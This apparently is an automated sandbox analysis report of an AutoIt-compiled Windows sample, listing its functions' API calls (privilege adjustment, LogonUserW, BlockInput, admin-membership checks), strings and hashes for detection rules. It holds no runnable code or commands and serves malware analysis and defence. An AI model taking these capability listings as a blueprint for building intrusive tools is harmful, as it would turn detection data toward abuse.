Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 305b9ee1ca3324ca8cfc8183abcb10951f48e5292e292ea72da9ed862d0da21c
Instruction ID: 3a044e105ac7e732c81363642f3b82a71fc9118c42c1b5ae78c9bdebda7b8cfd
Opcode Fuzzy Hash: 305b9ee1ca3324ca8cfc8183abcb10951f48e5292e292ea72da9ed862d0da21c
Instruction Fuzzy Hash: 86217135A00118EFCB00EF65D881EAEBBF9FF59310F1480A9E805AB361DB31A956CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00198CC3, Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00160FF6: std::exception::exception.LIBCMT ref: 0016102C
Part of subcall function 00160FF6: __CxxThrowException@8.LIBCMT ref: 00161041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00198D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00198D3A
GetLastError.KERNEL32 ref: 00198D47

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: ac8f5e3e0b38374be75e8fce388c2cc11817416982e53f2b06968ff1fb12d828
Instruction ID: 8923b8ce49e80009246978befbb9bb2d4c06683826fa6e1b10ef0861ade2866d
Opcode Fuzzy Hash: ac8f5e3e0b38374be75e8fce388c2cc11817416982e53f2b06968ff1fb12d828
Instruction Fuzzy Hash: 861191B2414209AFDB28DF58DC85D6BBBFDFB44710B20852EF45693641EB30EC518A60

Uniqueness

Uniqueness Score: -1.00%

Function 001A4021, Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001A404B
DeviceIoControl.KERNEL32 ref: 001A4088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001A4091

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 0e1082c0c807887e40860e82062cdb518471fb80331c9e52812a6c791f42b292
Instruction ID: aa45be1f236a54f3e3cff2049641ef5472f6c71f990cd507c173c938eb25973d
Opcode Fuzzy Hash: 0e1082c0c807887e40860e82062cdb518471fb80331c9e52812a6c791f42b292
Instruction Fuzzy Hash: 121182B1D00228BFE7109BE8DD48FAFBBBCEB49710F00065ABA04E7191C3B49D4587A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A4C03, Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001A4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001A4C43
FreeSid.ADVAPI32(?), ref: 001A4C53

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f9bdc649d890dbf7882bf6f5261114ff9e1c1da5a1b0702cb2c41057cd54f6ac
Instruction ID: ed37814b830c15804c45ec2f033f82b79687f6f4d88c217c830ba823441e40e9
Opcode Fuzzy Hash: f9bdc649d890dbf7882bf6f5261114ff9e1c1da5a1b0702cb2c41057cd54f6ac
Instruction Fuzzy Hash: F8F04975A5130CBFDF04DFF0DC89EAEBBBDEF08611F1044A9A901E2581E770AA548B50

Uniqueness

Uniqueness Score: -1.00%

Function 001A4696, Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0017E7C1), ref: 001A46A6
FindFirstFileW.KERNEL32(?,?), ref: 001A46B7
FindClose.KERNEL32(00000000), ref: 001A46C7

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d357c17af58643852f7096a463c0dc525e75c77c3b73d80266c50b12f7f486f7
Instruction ID: d79610b499294b30b63db9bad43ad4e08b7225862b5d272e9ed13c788ea2ba3f
Opcode Fuzzy Hash: d357c17af58643852f7096a463c0dc525e75c77c3b73d80266c50b12f7f486f7
Instruction Fuzzy Hash: 8EE0D8358108006B42106738EC4D8EA7B5D9F47335F100719F879C14E0E7F0D9948599

Uniqueness

Uniqueness Score: -1.00%

Function 001AC93C, Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001AC966
FindClose.KERNEL32(00000000), ref: 001AC996

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9636cf6ca8f4a3cd8d324dd1d75887ff6b5aa83763fb42095c8e1a95843d45c5
Instruction ID: 33d0197d82a58293853077a40049290c7db51df4ce1a41f2e57e58450981d0fa
Opcode Fuzzy Hash: 9636cf6ca8f4a3cd8d324dd1d75887ff6b5aa83763fb42095c8e1a95843d45c5
Instruction Fuzzy Hash: FE113C766106109FDB10AF29D845A2AB7E9EF95324F10855EF8A9D72A1DB30A801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001AA2D5, Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001B977D,?,001CFB84,?), ref: 001AA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001B977D,?,001CFB84,?), ref: 001AA314

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 60047e88688d768b9e0e86952d11f73f946d4fd95adec69cb8cefb24a31937b7
Instruction ID: b33a6e9217b0f71821d71dd5cfa72dcb5c395f0bfb65965f6bfa6927eccfd435
Opcode Fuzzy Hash: 60047e88688d768b9e0e86952d11f73f946d4fd95adec69cb8cefb24a31937b7
Instruction Fuzzy Hash: 59F0823554422DBBDB109FA4CC48FEA7B6DBF09761F008169B918D7191D730D944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00198713, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00198851), ref: 00198728
CloseHandle.KERNEL32(?,?,00198851), ref: 0019873A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f453eeb3ece03b49481f93aaa49fd64bae90a0725e5242a0a43ec2b8709ae53d
Instruction ID: 28e74e5beece37bc276efb51cfbeb3744128533c539abc88c303470d69f12233
Opcode Fuzzy Hash: f453eeb3ece03b49481f93aaa49fd64bae90a0725e5242a0a43ec2b8709ae53d
Instruction Fuzzy Hash: 2CE0B676010650FEEB252B60EC09D777BAAEB04750724882EB49680870DB62ACE1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B41FD, Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 001B4218

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: fde55a3764e66455d843ccdc3b42851f8498389e20637028516c010c5149e5de
Instruction ID: 095b5c1082b974705ba869b1ef73f6f6cd0a2c1677c599b45a0bdba680336f1d
Opcode Fuzzy Hash: fde55a3764e66455d843ccdc3b42851f8498389e20637028516c010c5149e5de
Instruction Fuzzy Hash: 1DE04F752402149FC710EF5AE844E9BFBE8AFA4760F01C06AFC49C7362DB70E8418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001A4EC9, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 001A4EEC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 6a5ec2d92b42a3d1882bc34c956e294853929be9ef69dace9f539496d58f8949
Instruction ID: 602f4a751032ade7fbda27fea8ce79ae2a379f27a0c2df0d6721b501dca06164
Opcode Fuzzy Hash: 6a5ec2d92b42a3d1882bc34c956e294853929be9ef69dace9f539496d58f8949
Instruction Fuzzy Hash: 4BD05EDC1607043BEC6C4B289C5FF770149F383781FE0414AB142890C1DBD86C555030

Uniqueness

Uniqueness Score: -1.00%

Function 00198C93, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001988D1), ref: 00198CB3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: f9a785327abdee99f7bd82effc7dd733cdd7d89fafd2868b5a1e20645d7f3697
Instruction ID: 4272d0b0e121f78bb8efb39d358f5adff2babd5cd653b01440c9f7dd08bd53b2
Opcode Fuzzy Hash: f9a785327abdee99f7bd82effc7dd733cdd7d89fafd2868b5a1e20645d7f3697
Instruction Fuzzy Hash: 67D05E3226050EABEF018EA4DC05EAE3B6AEB04B01F408111FE15C50A1C775D835AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00182230, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00182242

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 485fb3ba8d38ab71fbb17ecf235d1e94492bdfe9aa4159f2e02c4a6c55d713ee
Instruction ID: 468d6f25946e1ae59adaabd5cbc380fd0ece74e0b99ba6f831628634410adadb
Opcode Fuzzy Hash: 485fb3ba8d38ab71fbb17ecf235d1e94492bdfe9aa4159f2e02c4a6c55d713ee
Instruction Fuzzy Hash: 9AC04CF2801109DBDB05DB90D988DEE77BDAB04305F114066A102F2100D7749B458F71

Uniqueness

Uniqueness Score: -1.00%

Function 001CA849, Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 001CA89F
GetSysColorBrush.USER32(0000000F), ref: 001CA8D0
GetSysColor.USER32(0000000F), ref: 001CA8DC
SetBkColor.GDI32(?,000000FF), ref: 001CA8F6
SelectObject.GDI32(?,?), ref: 001CA905
InflateRect.USER32(?,000000FF,000000FF), ref: 001CA930
GetSysColor.USER32(00000010), ref: 001CA938
CreateSolidBrush.GDI32(00000000), ref: 001CA93F
FrameRect.USER32 ref: 001CA94E
DeleteObject.GDI32(00000000), ref: 001CA955
InflateRect.USER32(?,000000FE,000000FE), ref: 001CA9A0
FillRect.USER32 ref: 001CA9D2
GetWindowLongW.USER32(?,000000F0), ref: 001CA9FD

Part of subcall function 001CAB60: GetSysColor.USER32(00000012), ref: 001CAB99
Part of subcall function 001CAB60: SetTextColor.GDI32(?,?), ref: 001CAB9D
Part of subcall function 001CAB60: GetSysColorBrush.USER32(0000000F), ref: 001CABB3
Part of subcall function 001CAB60: GetSysColor.USER32(0000000F), ref: 001CABBE
Part of subcall function 001CAB60: GetSysColor.USER32(00000011), ref: 001CABDB
Part of subcall function 001CAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001CABE9
Part of subcall function 001CAB60: SelectObject.GDI32(?,00000000), ref: 001CABFA
Part of subcall function 001CAB60: SetBkColor.GDI32(?,00000000), ref: 001CAC03
Part of subcall function 001CAB60: SelectObject.GDI32(?,?), ref: 001CAC10
Part of subcall function 001CAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 001CAC2F
Part of subcall function 001CAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001CAC46
Part of subcall function 001CAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 001CAC5B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: faf147c2cf449a0d15aded9bfcca37a3622997e512414b9b49267de64f19ebce
Instruction ID: d078423750e343dfe144b3d6041e0391e9c84599845953006f0361ad1f139dfe
Opcode Fuzzy Hash: faf147c2cf449a0d15aded9bfcca37a3622997e512414b9b49267de64f19ebce
Instruction Fuzzy Hash: 63A19E72008305EFD7119F64DC08F6B7BAAFF88325F544A2DFA62965A0D730D886CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00142C18, Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00142CA2
DeleteObject.GDI32(00000000), ref: 00142CE8
DeleteObject.GDI32(00000000), ref: 00142CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00142CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00142D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0017C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0017C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0017CAED

Part of subcall function 00141B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00142036,?,00000000,?,?,?,?,001416CB,00000000,?), ref: 00141B9A

SendMessageW.USER32(?,00001053), ref: 0017CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0017CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0017CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0017CB62

Strings

0, xrefs: 0017C981

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: c857a426cb505343376ad499672ccdfaf9f2c9e7d4130458f3f3abb4d1e395b7
Instruction ID: f30fd356abc956342f188c9320e1b8dd1d229bb5f4027eb826fe9f64d6ef7a02
Opcode Fuzzy Hash: c857a426cb505343376ad499672ccdfaf9f2c9e7d4130458f3f3abb4d1e395b7
Instruction Fuzzy Hash: FE128B30604201EFDB24CF24C884BA9BBF5BF55315F54856DF999DB662CB31E882CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001B77BE, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 001B77F1
SystemParametersInfoW.USER32 ref: 001B78B0
SetRect.USER32 ref: 001B78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001B7900
CreateWindowExW.USER32 ref: 001B7946
GetClientRect.USER32 ref: 001B7952
CreateWindowExW.USER32 ref: 001B7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001B79A5
GetStockObject.GDI32(00000011), ref: 001B79B5
SelectObject.GDI32(00000000,00000000), ref: 001B79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001B79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B79D2
DeleteDC.GDI32(00000000), ref: 001B79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 001B7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 001B7A1E
CreateWindowExW.USER32 ref: 001B7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001B7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 001B7A7E
CreateWindowExW.USER32 ref: 001B7AAE
GetStockObject.GDI32(00000011), ref: 001B7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001B7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001B7ACE

Strings

AutoIt v3, xrefs: 001B793E
static, xrefs: 001B7990, 001B7AA8
DISPLAY, xrefs: 001B799B
msctls_progress32, xrefs: 001B7A4F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: a43bf15f2be3020ad228376f27798b9ff5ab82d3edcb2e1ad2824681d4aa786a
Instruction ID: 4d9cda156a80c230500fd31329b7cfe2c20b640a5f7f95600b7c12eb58193466
Opcode Fuzzy Hash: a43bf15f2be3020ad228376f27798b9ff5ab82d3edcb2e1ad2824681d4aa786a
Instruction Fuzzy Hash: 8CA160B1A40215BFEB14DBA4DC4AFAE7BBAEB44714F004118FA15A72E1C770AD51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001AAF7B, Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001AAF89
GetDriveTypeW.KERNEL32(?,001CFAC0,?,\\.\,001CF910), ref: 001AB066
SetErrorMode.KERNEL32(00000000,001CFAC0,?,\\.\,001CF910), ref: 001AB1C4

Strings

SAS, xrefs: 001AB170
RAMDisk, xrefs: 001AB090
SSD, xrefs: 001AB0F1
CDROM, xrefs: 001AB09A
\\.\, xrefs: 001AAFDB
FileBackedVirtual, xrefs: 001AB193
SATA, xrefs: 001AB177
ATA, xrefs: 001AB13F
MMC, xrefs: 001AB185
ATAPI, xrefs: 001AB138
Fibre, xrefs: 001AB154
PhysicalDrive, xrefs: 001AB012
Removable, xrefs: 001AB0B8
SSA, xrefs: 001AB14D
Network, xrefs: 001AB0A4
iSCSI, xrefs: 001AB169
Fixed, xrefs: 001AB0AE
RAID, xrefs: 001AB162
SCSI, xrefs: 001AB131
Unknown, xrefs: 001AB086, 001AB12A
Virtual, xrefs: 001AB18C
USB, xrefs: 001AB15B
1394, xrefs: 001AB146

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6f191b10343013847d72400ce60847160d745d2a8d10a1e2a51bd316f69dc1b8
Instruction ID: 38a82fea5dc59c8cb03cc6e35cae00804927bf55a69a68188dd30bc47b06bab5
Opcode Fuzzy Hash: 6f191b10343013847d72400ce60847160d745d2a8d10a1e2a51bd316f69dc1b8
Instruction Fuzzy Hash: E9512878688389EBCB08EB10DAD2C7D77B1EF66341B604115F50EE7292C73AAD41DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00146A3C, Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00146A91
__wcsnicmp.LIBCMT ref: 00146AA9
__wcsnicmp.LIBCMT ref: 00146AC1
__wcsnicmp.LIBCMT ref: 00146AD9
__wcsnicmp.LIBCMT ref: 00146AF1
__wcsnicmp.LIBCMT ref: 00146B09
__wcsnicmp.LIBCMT ref: 00146B21
__wcsnicmp.LIBCMT ref: 00146B35
__wcsnicmp.LIBCMT ref: 00146B76
__wcsnicmp.LIBCMT ref: 00146B8A
__wcsnicmp.LIBCMT ref: 00146B9E
__wcsnicmp.LIBCMT ref: 00146BB2

Strings

Unterminated group of comments, xrefs: 0017E82C
#ce, xrefs: 00146BAC
#OnAutoItStartRegister, xrefs: 00146AD3
#comments-end, xrefs: 00146B98
#requireadmin, xrefs: 00146ABB
#pragma compile, xrefs: 00146A8B
Bad directive syntax error, xrefs: 0017E743
Cannot parse #include, xrefs: 0017E819
#include, xrefs: 00146B03
#notrayicon, xrefs: 00146AA3
#comments-start, xrefs: 00146B1B, 00146B70
#include-once, xrefs: 00146AEB
#cs, xrefs: 00146B2F, 00146B84

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 151d064542b7adec20dba8c1e67caec087ea4e65ceead6d9080981771409a7cb
Instruction ID: 40213fed2b424219c1b75aad9b575b2be7b69f3aaa93fe273218c77a97a38919
Opcode Fuzzy Hash: 151d064542b7adec20dba8c1e67caec087ea4e65ceead6d9080981771409a7cb
Instruction Fuzzy Hash: A1811D70740215B7CB24AF60CC82FAE77A8EF36704F148025FD49AB1E2EB70DA55D292

Uniqueness

Uniqueness Score: -1.00%

Function 001CAB60, Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 001CAB99
SetTextColor.GDI32(?,?), ref: 001CAB9D
GetSysColorBrush.USER32(0000000F), ref: 001CABB3
GetSysColor.USER32(0000000F), ref: 001CABBE
CreateSolidBrush.GDI32(?), ref: 001CABC3
GetSysColor.USER32(00000011), ref: 001CABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 001CABE9
SelectObject.GDI32(?,00000000), ref: 001CABFA
SetBkColor.GDI32(?,00000000), ref: 001CAC03
SelectObject.GDI32(?,?), ref: 001CAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 001CAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001CAC46
